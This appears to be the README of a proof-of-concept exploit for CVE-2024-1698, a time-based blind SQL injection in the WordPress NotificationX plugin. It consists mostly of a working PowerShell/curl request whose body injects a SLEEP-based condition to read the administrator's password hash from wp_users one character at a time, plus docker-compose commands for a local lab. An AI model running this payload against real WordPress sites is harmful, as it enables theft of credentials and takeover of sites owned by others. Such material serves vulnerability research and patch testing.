
Эксплойт доказательства концепции для CVE-2024-1698, слепой SQL-инъекции в плагине WordPress NotificationX, позволяющий извлечение данных из базы данных на основе времени.
docker-compose up --build
docker-compose down
Measure-Command {
curl.exe http://localhost/wp-json/notificationx/v1/analytics `
-Method Post `
-Body 'nx_id=1337&type=clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),1,1))=36,SLEEP(10),null)-- -'
}